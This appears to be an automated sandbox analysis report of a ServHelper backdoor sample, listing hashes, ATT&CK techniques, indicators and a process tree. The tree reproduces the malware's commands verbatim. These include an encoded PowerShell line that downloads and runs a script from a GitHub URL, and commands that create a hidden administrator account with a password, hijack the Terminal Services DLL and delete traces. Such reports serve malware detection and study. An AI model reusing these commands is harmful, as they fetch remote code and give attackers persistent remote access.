servhelper | 1d35504c81463a2597916e4ea5448d45caee98ccc8557e256bcc05a567584b37

Analysis

max time kernel
111s
max time network
57s
platform
windows7_x64
resource
win7-20240704-en
resource tags

arch:x64arch:x86image:win7-20240704-enlocale:en-usos:windows7-x64system
submitted
29-08-2024 08:54

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

40d10714cfb75e2f22c44fd44e85d1d0N.exe
Size

7.1MB
MD5

40d10714cfb75e2f22c44fd44e85d1d0
SHA1

79e291688ecb088468e0162b0685956be1206fbd
SHA256

1d35504c81463a2597916e4ea5448d45caee98ccc8557e256bcc05a567584b37
SHA512

98095c75bc12cc6a0f353f7d40155a44222dab25569ee736ab232f7c985ebfbf4ffb9fab80dd27e2c581729f571029ed6eaea61d5bac32ac1ac3566e7faf2e4b
SSDEEP

196608:ZJM3nfEyJ8X2RmnK0v0Ahh0yfcjkbMebHjgTF8R:Z2f6X2RFWhSyQe3sFS

Score

10^/10

servhelper backdoor defense_evasion discovery execution exploit lateral_movement persistence trojan upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

ServHelper
ServHelper is a backdoor written in Delphi and is associated with the hacking group TA505.
trojan backdoor servhelper
Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Remote Service Session Hijacking: RDP Hijacking 1 TTPs 6 IoCs
Adversaries may hijack a legitimate user's remote desktop session to move laterally within an environment.
lateral_movement

RDP Hijacking
T1563.002

Processes:

cmd.exenet.exenet1.execmd.exenet.exenet1.exe

pid process

1584 cmd.exe
3064 net.exe
2992 net1.exe
896 cmd.exe
2476 net.exe
2200 net1.exe
Blocklisted process makes network request 2 IoCs

Processes:

powershell.exe

flow pid process

6 2932 powershell.exe
7 2932 powershell.exe
Indicator Removal: Network Share Connection Removal 1 TTPs 3 IoCs
Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.
defense_evasion

Network Share Connection Removal
T1070.005

Processes:

cmd.exenet.exenet1.exe

pid process

2456 cmd.exe
2260 net.exe
1908 net1.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1021.001
Possible privilege escalation attempt 8 IoCs
exploit

Processes:

takeown.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exeicacls.exe

pid process

800 takeown.exe
948 icacls.exe
1376 icacls.exe
1912 icacls.exe
1604 icacls.exe
1180 icacls.exe
2364 icacls.exe
2204 icacls.exe

pid	process
1584	cmd.exe
3064	net.exe
2992	net1.exe
896	cmd.exe
2476	net.exe
2200	net1.exe

flow	pid	process
6	2932	powershell.exe
7	2932	powershell.exe

pid	process
2456	cmd.exe
2260	net.exe
1908	net1.exe

pid	process
800	takeown.exe
948	icacls.exe
1376	icacls.exe
1912	icacls.exe
1604	icacls.exe
1180	icacls.exe
2364	icacls.exe
2204	icacls.exe

Server Software Component: Terminal Services DLL 1 TTPs 1 IoCs

persistence

Terminal Services DLL

T1505.005

Processes:

reg.exe

description	ioc	process
Set value (str)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\TermService\Parameters\ServiceDLL = "C:\\Windows\\branding\\mediasrv.png"	reg.exe

Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

1664 powershell.exe
Executes dropped EXE 3 IoCs

Processes:

Ridere.exe.comRidere.exe.comRidere.exe.com

pid process

2324 Ridere.exe.com
2932 Ridere.exe.com
2700 Ridere.exe.com
Loads dropped DLL 5 IoCs

Processes:

cmd.exeRidere.exe.comRidere.exe.com

pid process

2012 cmd.exe
2324 Ridere.exe.com
2932 Ridere.exe.com
2488
2488
Modifies file permissions 1 TTPs 8 IoCs
discovery

File and Directory Permissions Modification
T1222

Processes:

icacls.exeicacls.exeicacls.exeicacls.exeicacls.exetakeown.exeicacls.exeicacls.exe

pid process

1912 icacls.exe
1604 icacls.exe
1180 icacls.exe
2364 icacls.exe
2204 icacls.exe
800 takeown.exe
948 icacls.exe
1376 icacls.exe

pid	process
2324	Ridere.exe.com
2932	Ridere.exe.com
2700	Ridere.exe.com

pid	process
2012	cmd.exe
2324	Ridere.exe.com
2932	Ridere.exe.com
2488
2488

pid	process
1912	icacls.exe
1604	icacls.exe
1180	icacls.exe
2364	icacls.exe
2204	icacls.exe
800	takeown.exe
948	icacls.exe
1376	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs

Web Service
T1102

Processes:

flow ioc

5 raw.githubusercontent.com
6 raw.githubusercontent.com
7 raw.githubusercontent.com
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File created C:\Windows\system32\rfxvmt.dll powershell.exe
Suspicious use of SetThreadContext 1 IoCs

Processes:

Ridere.exe.com

description pid process target process

PID 2932 set thread context of 2700 2932 Ridere.exe.com Ridere.exe.com

flow	ioc
5	raw.githubusercontent.com
6	raw.githubusercontent.com
7	raw.githubusercontent.com

description	ioc	process
File created	C:\Windows\system32\rfxvmt.dll	powershell.exe

description	pid	process	target process
PID 2932 set thread context of 2700	2932	Ridere.exe.com	Ridere.exe.com

Drops file in Windows directory 9 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9NPKGHC929UFUIMI0HVR.temp	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 4 IoCs
Using powershell.exe command.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

pid process

1088 powershell.exe
1444 powershell.exe
2816 powershell.exe
2932 powershell.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

pid	process
1088	powershell.exe
1444	powershell.exe
2816	powershell.exe
2932	powershell.exe

System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

40d10714cfb75e2f22c44fd44e85d1d0N.execmd.execmd.exefindstr.exePING.EXE

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	40d10714cfb75e2f22c44fd44e85d1d0N.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	PING.EXE

System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
discovery

Internet Connection Discovery
T1016.001

Processes:

PING.EXE

pid process

2652 PING.EXE
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.

System Information Discovery
T1082

Processes:

WMIC.exe

pid process

2868 WMIC.exe

pid	process
2652	PING.EXE

pid	process
2868	WMIC.exe

Modifies data under HKEY_USERS 4 IoCs

Processes:

WMIC.exeWMIC.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = 60fc5e2cf1f9da01	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

1720 reg.exe
Runs net.exe
Runs ping.exe 1 TTPs 1 IoCs

Remote System Discovery
T1018

Processes:

PING.EXE

pid process

2652 PING.EXE

pid	process
1720	reg.exe

pid	process
2652	PING.EXE

Suspicious behavior: EnumeratesProcesses 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1664	powershell.exe
1088	powershell.exe
1444	powershell.exe
2816	powershell.exe
1664	powershell.exe
1664	powershell.exe
1664	powershell.exe
2932	powershell.exe

Suspicious behavior: LoadsDriver 4 IoCs

Processes:

pid process

476
2488
2488
2488

pid	process
476
2488
2488
2488

Suspicious use of AdjustPrivilegeToken 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exeicacls.exeWMIC.exeWMIC.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1664	powershell.exe
Token: SeDebugPrivilege	1088	powershell.exe
Token: SeDebugPrivilege	1444	powershell.exe
Token: SeDebugPrivilege	2816	powershell.exe
Token: SeRestorePrivilege	1376	icacls.exe
Token: SeAssignPrimaryTokenPrivilege	2868	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2868	WMIC.exe
Token: SeAuditPrivilege	2868	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2868	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2868	WMIC.exe
Token: SeAuditPrivilege	2868	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2368	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2368	WMIC.exe
Token: SeAuditPrivilege	2368	WMIC.exe
Token: SeAssignPrimaryTokenPrivilege	2368	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2368	WMIC.exe
Token: SeAuditPrivilege	2368	WMIC.exe
Token: SeDebugPrivilege	2932	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

40d10714cfb75e2f22c44fd44e85d1d0N.execmd.execmd.exeRidere.exe.comRidere.exe.comRidere.exe.compowershell.execsc.exe

description	pid	process	target process
PID 2104 wrote to memory of 2368	2104	40d10714cfb75e2f22c44fd44e85d1d0N.exe	cmd.exe
PID 2104 wrote to memory of 2368	2104	40d10714cfb75e2f22c44fd44e85d1d0N.exe	cmd.exe
PID 2104 wrote to memory of 2368	2104	40d10714cfb75e2f22c44fd44e85d1d0N.exe	cmd.exe
PID 2104 wrote to memory of 2368	2104	40d10714cfb75e2f22c44fd44e85d1d0N.exe	cmd.exe
PID 2368 wrote to memory of 2012	2368	cmd.exe	cmd.exe
PID 2368 wrote to memory of 2012	2368	cmd.exe	cmd.exe
PID 2368 wrote to memory of 2012	2368	cmd.exe	cmd.exe
PID 2368 wrote to memory of 2012	2368	cmd.exe	cmd.exe
PID 2012 wrote to memory of 2092	2012	cmd.exe	findstr.exe
PID 2012 wrote to memory of 2092	2012	cmd.exe	findstr.exe
PID 2012 wrote to memory of 2092	2012	cmd.exe	findstr.exe
PID 2012 wrote to memory of 2092	2012	cmd.exe	findstr.exe
PID 2012 wrote to memory of 2324	2012	cmd.exe	Ridere.exe.com
PID 2012 wrote to memory of 2324	2012	cmd.exe	Ridere.exe.com
PID 2012 wrote to memory of 2324	2012	cmd.exe	Ridere.exe.com
PID 2012 wrote to memory of 2324	2012	cmd.exe	Ridere.exe.com
PID 2012 wrote to memory of 2652	2012	cmd.exe	PING.EXE
PID 2012 wrote to memory of 2652	2012	cmd.exe	PING.EXE
PID 2012 wrote to memory of 2652	2012	cmd.exe	PING.EXE
PID 2012 wrote to memory of 2652	2012	cmd.exe	PING.EXE
PID 2324 wrote to memory of 2932	2324	Ridere.exe.com	Ridere.exe.com
PID 2324 wrote to memory of 2932	2324	Ridere.exe.com	Ridere.exe.com
PID 2324 wrote to memory of 2932	2324	Ridere.exe.com	Ridere.exe.com
PID 2932 wrote to memory of 2700	2932	Ridere.exe.com	Ridere.exe.com
PID 2932 wrote to memory of 2700	2932	Ridere.exe.com	Ridere.exe.com
PID 2932 wrote to memory of 2700	2932	Ridere.exe.com	Ridere.exe.com
PID 2932 wrote to memory of 2700	2932	Ridere.exe.com	Ridere.exe.com
PID 2932 wrote to memory of 2700	2932	Ridere.exe.com	Ridere.exe.com
PID 2700 wrote to memory of 1664	2700	Ridere.exe.com	powershell.exe
PID 2700 wrote to memory of 1664	2700	Ridere.exe.com	powershell.exe
PID 2700 wrote to memory of 1664	2700	Ridere.exe.com	powershell.exe
PID 1664 wrote to memory of 2628	1664	powershell.exe	csc.exe
PID 1664 wrote to memory of 2628	1664	powershell.exe	csc.exe
PID 1664 wrote to memory of 2628	1664	powershell.exe	csc.exe
PID 2628 wrote to memory of 1708	2628	csc.exe	cvtres.exe
PID 2628 wrote to memory of 1708	2628	csc.exe	cvtres.exe
PID 2628 wrote to memory of 1708	2628	csc.exe	cvtres.exe
PID 1664 wrote to memory of 1088	1664	powershell.exe	powershell.exe
PID 1664 wrote to memory of 1088	1664	powershell.exe	powershell.exe
PID 1664 wrote to memory of 1088	1664	powershell.exe	powershell.exe
PID 1664 wrote to memory of 1444	1664	powershell.exe	powershell.exe
PID 1664 wrote to memory of 1444	1664	powershell.exe	powershell.exe
PID 1664 wrote to memory of 1444	1664	powershell.exe	powershell.exe
PID 1664 wrote to memory of 2816	1664	powershell.exe	powershell.exe
PID 1664 wrote to memory of 2816	1664	powershell.exe	powershell.exe
PID 1664 wrote to memory of 2816	1664	powershell.exe	powershell.exe
PID 1664 wrote to memory of 800	1664	powershell.exe	takeown.exe
PID 1664 wrote to memory of 800	1664	powershell.exe	takeown.exe
PID 1664 wrote to memory of 800	1664	powershell.exe	takeown.exe
PID 1664 wrote to memory of 948	1664	powershell.exe	icacls.exe
PID 1664 wrote to memory of 948	1664	powershell.exe	icacls.exe
PID 1664 wrote to memory of 948	1664	powershell.exe	icacls.exe
PID 1664 wrote to memory of 1376	1664	powershell.exe	icacls.exe
PID 1664 wrote to memory of 1376	1664	powershell.exe	icacls.exe
PID 1664 wrote to memory of 1376	1664	powershell.exe	icacls.exe
PID 1664 wrote to memory of 1912	1664	powershell.exe	icacls.exe
PID 1664 wrote to memory of 1912	1664	powershell.exe	icacls.exe
PID 1664 wrote to memory of 1912	1664	powershell.exe	icacls.exe
PID 1664 wrote to memory of 1604	1664	powershell.exe	icacls.exe
PID 1664 wrote to memory of 1604	1664	powershell.exe	icacls.exe
PID 1664 wrote to memory of 1604	1664	powershell.exe	icacls.exe
PID 1664 wrote to memory of 1180	1664	powershell.exe	icacls.exe
PID 1664 wrote to memory of 1180	1664	powershell.exe	icacls.exe
PID 1664 wrote to memory of 1180	1664	powershell.exe	icacls.exe

C:\Users\Admin\AppData\Local\Temp\40d10714cfb75e2f22c44fd44e85d1d0N.exe
"C:\Users\Admin\AppData\Local\Temp\40d10714cfb75e2f22c44fd44e85d1d0N.exe"
1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2104
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\System32\cmd.exe" /c cmd < Rimanete.tif
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2368
- - C:\Windows\SysWOW64\cmd.exe
    cmd
    3⤵
    - Loads dropped DLL
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2012
  - - C:\Windows\SysWOW64\findstr.exe
      findstr /V /R "^VTfYuQOpFJudcGruzcImzLEAazBBhsyZnLoMSzOJIRuLfpTwSWYiqJalgOGNgjVhDuSKndhqGYRBETkoAmJdzXZOzYntMwxcVTiosoCCIXAeRQFxDnjPDFUGirsASpgFDc$" Vedevo.tif
      4⤵
      System Location Discovery: System Language Discovery
      PID:2092
  - - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Ridere.exe.com
      Ridere.exe.com v
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Suspicious use of WriteProcessMemory
      PID:2324
    - - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Ridere.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Ridere.exe.com v
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2932
      - C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Ridere.exe.com
        
        C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Ridere.exe.com
        6⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2700
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
        7⤵
        Deletes itself
        Drops file in System32 directory
        Drops file in Windows directory
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1664
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\doixlofc.cmdline"
        8⤵
        Suspicious use of WriteProcessMemory
        
        PID:2628
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES49ED.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC49EC.tmp"
        9⤵
        
        PID:1708
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1088
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1444
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -s -NoLogo -NoProfile
        8⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2816
        
        C:\Windows\system32\takeown.exe
        
        "C:\Windows\system32\takeown.exe" /A /F rfxvmt.dll
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:800
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /inheritance:d
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:948
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /setowner "NT SERVICE\TrustedInstaller"
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        Suspicious use of AdjustPrivilegeToken
        
        PID:1376
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT SERVICE\TrustedInstaller:F"
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1912
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove "NT AUTHORITY\SYSTEM"
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1604
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant "NT AUTHORITY\SYSTEM:RX"
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:1180
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /remove BUILTIN\Administrators
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2364
        
        C:\Windows\system32\icacls.exe
        
        "C:\Windows\system32\icacls.exe" rfxvmt.dll /grant BUILTIN\Administrators:RX
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2204
        
        C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
        8⤵
        
        PID:2656
        
        C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
        8⤵
        Server Software Component: Terminal Services DLL
        Modifies registry key
        
        PID:1720
        
        C:\Windows\system32\reg.exe
        
        "C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
        8⤵
        
        PID:1268
        
        C:\Windows\system32\net.exe
        
        "C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        8⤵
        
        PID:900
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add
        9⤵
        
        PID:836
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr
        8⤵
        
        PID:2280
        
        C:\Windows\system32\cmd.exe
        
        cmd /c net start rdpdr
        9⤵
        
        PID:1996
        
        C:\Windows\system32\net.exe
        
        net start rdpdr
        10⤵
        
        PID:1132
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start rdpdr
        11⤵
        
        PID:2268
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c cmd /c net start TermService
        8⤵
        
        PID:860
        
        C:\Windows\system32\cmd.exe
        
        cmd /c net start TermService
        9⤵
        
        PID:1692
        
        C:\Windows\system32\net.exe
        
        net start TermService
        10⤵
        
        PID:2184
        
        C:\Windows\system32\net1.exe
        
        C:\Windows\system32\net1 start TermService
        11⤵
        
        PID:2248
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f
        8⤵
        
        PID:572
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f
        8⤵
        
        PID:2464
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 30
      4⤵
      System Location Discovery: System Language Discovery
      System Network Configuration Discovery: Internet Connection Discovery
      Runs ping.exe
      PID:2652

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc Ghar4f5 /del
1⤵
- Indicator Removal: Network Share Connection Removal
PID:2456
- C:\Windows\system32\net.exe
  net.exe user wgautilacc Ghar4f5 /del
  2⤵
  - Indicator Removal: Network Share Connection Removal
  PID:2260
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc Ghar4f5 /del
    3⤵
    - Indicator Removal: Network Share Connection Removal
    PID:1908

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc 14S8mRDp /add
1⤵
PID:2148
- C:\Windows\system32\net.exe
  net.exe user wgautilacc 14S8mRDp /add
  2⤵
  PID:1576
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc 14S8mRDp /add
    3⤵
    PID:1580

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:1584
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  PID:3064
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" wgautilacc /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:2992

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Remote Desktop Users" FMEDFXFE$ /ADD
1⤵
- Remote Service Session Hijacking: RDP Hijacking
PID:896
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Remote Desktop Users" FMEDFXFE$ /ADD
  2⤵
  - Remote Service Session Hijacking: RDP Hijacking
  PID:2476
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" FMEDFXFE$ /ADD
    3⤵
    - Remote Service Session Hijacking: RDP Hijacking
    PID:2200

C:\Windows\System32\cmd.exe
cmd /C net.exe LOCALGROUP "Administrators" wgautilacc /ADD
1⤵
PID:804
- C:\Windows\system32\net.exe
  net.exe LOCALGROUP "Administrators" wgautilacc /ADD
  2⤵
  PID:2660
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 LOCALGROUP "Administrators" wgautilacc /ADD
    3⤵
    PID:2796

C:\Windows\System32\cmd.exe
cmd /C net.exe user wgautilacc 14S8mRDp
1⤵
PID:2772
- C:\Windows\system32\net.exe
  net.exe user wgautilacc 14S8mRDp
  2⤵
  PID:2764
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 user wgautilacc 14S8mRDp
    3⤵
    PID:2692

C:\Windows\System32\cmd.exe
cmd.exe /C wmic path win32_VideoController get name
1⤵
PID:2496
- C:\Windows\System32\Wbem\WMIC.exe
  wmic path win32_VideoController get name
  2⤵
  - Detects videocard installed
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2868

C:\Windows\System32\cmd.exe
cmd.exe /C wmic CPU get NAME
1⤵
PID:2508
- C:\Windows\System32\Wbem\WMIC.exe
  wmic CPU get NAME
  2⤵
  - Modifies data under HKEY_USERS
  - Suspicious use of AdjustPrivilegeToken
  PID:2368

C:\Windows\System32\cmd.exe
cmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
1⤵
PID:2872
- C:\Windows\system32\cmd.exe
  cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
  2⤵
  PID:2820
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA
    3⤵
    - Blocklisted process makes network request
    - Drops file in Windows directory
    - Command and Scripting Interpreter: PowerShell
    - Modifies data under HKEY_USERS
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2932

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Account Manipulation

T1098

Server Software Component

T1505

Terminal Services DLL

T1505.005

Privilege Escalation

Account Manipulation

T1098

Defense Evasion

File and Directory Permissions Modification

T1222

Indicator Removal

T1070

File Deletion

T1070.004

Network Share Connection Removal

T1070.005

Modify Registry

T1112

Credential Access

Discovery

Permission Groups Discovery

T1069

Local Groups

T1069.001

Remote System Discovery

T1018

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

